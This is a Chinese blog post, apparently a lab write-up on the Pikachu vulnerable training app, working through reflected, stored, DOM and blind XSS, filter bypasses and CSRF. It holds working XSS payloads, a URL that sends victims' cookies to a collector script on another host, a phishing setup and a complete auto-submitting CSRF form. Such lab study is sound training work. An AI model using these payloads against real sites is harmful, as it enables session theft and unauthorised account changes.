web安全技术--XSS和CSRF

Posted p201721430032

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了web安全技术--XSS和CSRF相关的知识,希望对你有一定的参考价值。

Xss一般是脚本代码,主要是JS的,但是也有AS和VBS的。

主要分为反射型,存储型,DOM型三个大类。

一般来讲在手工测试的时候先要考虑的地方就是哪里有输入那里有输出。

 

然后是进行敏感字符测试,通常来讲会把  < > " ‘ ( ) &?这样的敏感字符进行测试然后查看服务器有没有防御或者转义措施。

还与就是几个html标签的插入和一些不闭合标签的插入。看一看过滤和是否被HTML编码了。然后还可以看看不闭合是否过滤。

然后就是测试js代码

<script> alert(123) </script>

      同理prompt啊confirm啊或者是script 内部src 一下测试一下。然后就是测试Script的大小写修改看一看是否能够绕过。

然后看

<scr<script>ipt>alert(123)</scr</script>ipt>这样的套娃游戏绕过一次过滤看看

还有重点就是<a href 的过滤。看一看数据和标签谁被过滤了。

如果数据没过滤就往里面href =" javascript:alert(123)">TEST</a>一下是否可以JS

如果被过滤了JS字符的话那就试试大小写绕过一下。

然后如果可以绕过那么就测试一下事件,看看会不会被过滤。

事件被过滤就看看是黑名还是白名,测试一些边缘的EVENT比如onclimbatree等等一般人不会拿来用的事件。如果没有被过滤证明是黑名单,那就可以选择一些其他事件。还有非常多的可以测试和绕过的地方,不过本身就是一个攻防之间的事情。。。策略上是非常大的所以写不完了。

XSS可以拿来干很多事情。常见的是偷Cookie 改内容,挂马 重定向 蠕虫

首先是反射性XSS试验攻击盗取cookies

尝试构造了函数进行cookies获取

技术图片

 

 然后获取成功,生成的盗取COOKIES的URL是172.22.19.240/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F172.22.19.240%2Fpikachu%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

反射性xss post

试了一下没有限制输入

技术图片

 

 修改了服务器的post.html文件,然后通过让对方访问我的http://172.22.19.240/pikachu/pkxss/xcookie/post.html就可以了

 

 

存储型xss

插一下看一看能不能插入js代码

技术图片

 

 

 

技术图片

 

 弹窗成功

尝试使用钓鱼

技术图片

插入js代码

技术图片

 

 技术图片

技术图片

 

 

 

 技术图片

 

 

 

 输入密码后信息转给172.22.38.205pikachupkxssxfishxfish.php发送给后台数据库

这板子应该是得重装才能第二次用了。

DOM型XSS

先测试一下有没有输入妨碍,发现

技术图片

 

技术图片

 

 技术图片

 

 

 找得到,在这个位置。发现标签闭合问题。直接选择“>闭合前面的标签。然后可以后面再插入一个鼠标扫过触发‘><img src="33" onmouseover="alert(222)">

技术图片

 

 

 但是在抓包过程中发现GET是没有发送参数的。

然后是DOM XSS x的

发现这个地方是进行传参的,就是说可以把这个URL发送给其他人让他们点击来执行代码‘> <imgsrc="231" onmouseover=alert("222")>

 

技术图片

 

 

 发现能利用这个URL来使对方触发http://172.22.38.205/pikachu/vul/xss/xss_dom_x.php?text=%27%3E+%3Cimgsrc%3D%22231%22+onmouseover%3Dalert%28%22222%22%29%3E

盲打

技术图片

 

首先尝试定位,发现搜不到,无法得到位置那就尝试直接闭合写

技术图片

 

 

 也没找到。。。进入后台发现

 技术图片

 

发现什么都没有。。。直接插入JS代码就可以了技术图片

 

 

 

技术图片

 

 

 XSS过滤

还是先定位+测试字符过滤

 

 技术图片

开始测试JS代码

<script>alert(1)</script>

技术图片

 

 

 

全没了。套娃也不成,应该是过滤了<script那就看看几次过滤<scri<scriptpt>alert(1)</scr</scriptipt>

但是结果依然。套娃失败。但是发现是个垃圾过滤。直接<ScRiPt>alert(1)</ScRiPt>大小写玩法就给绕过了

技术图片

 

 

 看样子不是什么好过滤,那<a herf之类的估计也可以。

xss的HTML特殊字符

直接注

<ScRiPt>alert(1)</ScRiPt>

查看了一下

技术图片

插了一下JS。直接成功

 

技术图片

 

 

 

 不过看了一下,貌似输入的字符很多都被转了。但是EVENT应该是可以触发的。

xss之href输出

因为提示是这个href输出,所以猜测一下里面是<a href

发现“被过滤了。。&quot;‘<>??&?/

那就是直接插入JS了javascript:alert(123)

技术图片

 

 

 

依然可以

xss之js输出

依然是瞎写入AAAAAAAAAAAAAa<>‘"?%&

然后定位了技术图片

 

 

发现在这个位置貌似也没过滤

先试着闭合一下然后注释后面

‘</script><script>alert(123)</script> -- 

技术图片

 

 可以。

--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

CSRF

CSRF(get)

那就先抓包看看GET发送的到底是个什么URL

技术图片

 

 

 技术图片

 

 

 GET /pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit这个是传递的URL。发现在参数内貌似没有账号相关。

那就直接URL构成172.22.38.205//pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=yuanziyin&phonenum=110&add=earth&email=yingyingying&submit=submit点就完事了

技术图片

 

 CSRF之post

这个也是一样构成一个POST文件123.html就可以了。。

构成了一个用来post的HTML文件直接访问http://172.22.38.205/pikachu/123.html

123.html

<html>
<head>
<script>
window.onload = function() {
  document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form method="post" action="http://172.22.38.205/pikachu/vul/csrf/csrfpost/csrf_post_edit.php">
    <input id="sex" type="text" name="sex" value="yuanziyin" />
    <input id="phonenum" type="text" name="phonenum" value="110" />
    <input id="add" type="text" name="add" value="nvzhuang" />
    <input id="email" type="text" name="email" value="zainance" />
    <input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>

然后就技术图片

CSRF 之TOKEN防御

TOKEN防御的问题就在于TOKEN够不够难

首先测试了一下是GET的方式。

技术图片

 

 不过这个难度比较大。。因为CSRF的TOKEN更新机制有关,比较麻烦,防范策略比较多,1分钟刷新一次或者一个网页一个TOKEN这种基本打不了。

但是实际上还有的TOKEN是不变或者是每次登入到登出都不变的就可以恶心恶心他了。可以打组合拳。XSS+CSRF有概率成功。这个还是不太好的策略,不过打比较弱的是可以的。

以上是关于web安全技术--XSS和CSRF的主要内容,如果未能解决你的问题,请参考以下文章

常见(XSS|CSRF)六大Web安全攻防解析

2019-2020-2 网络对抗技术 20175224 Exp9 Web安全基础

2019-2020-2 网络对抗技术 20175224 Exp9 Web安全基础

安全漏洞XSS、CSRF、SQL注入以及DDOS攻击

3大Web安全漏洞防御详解:XSS、CSRF、以及SQL注入解决方案

2019-2020-2 20175326 李一潇《网络对抗技术》Exp9 Web安全基础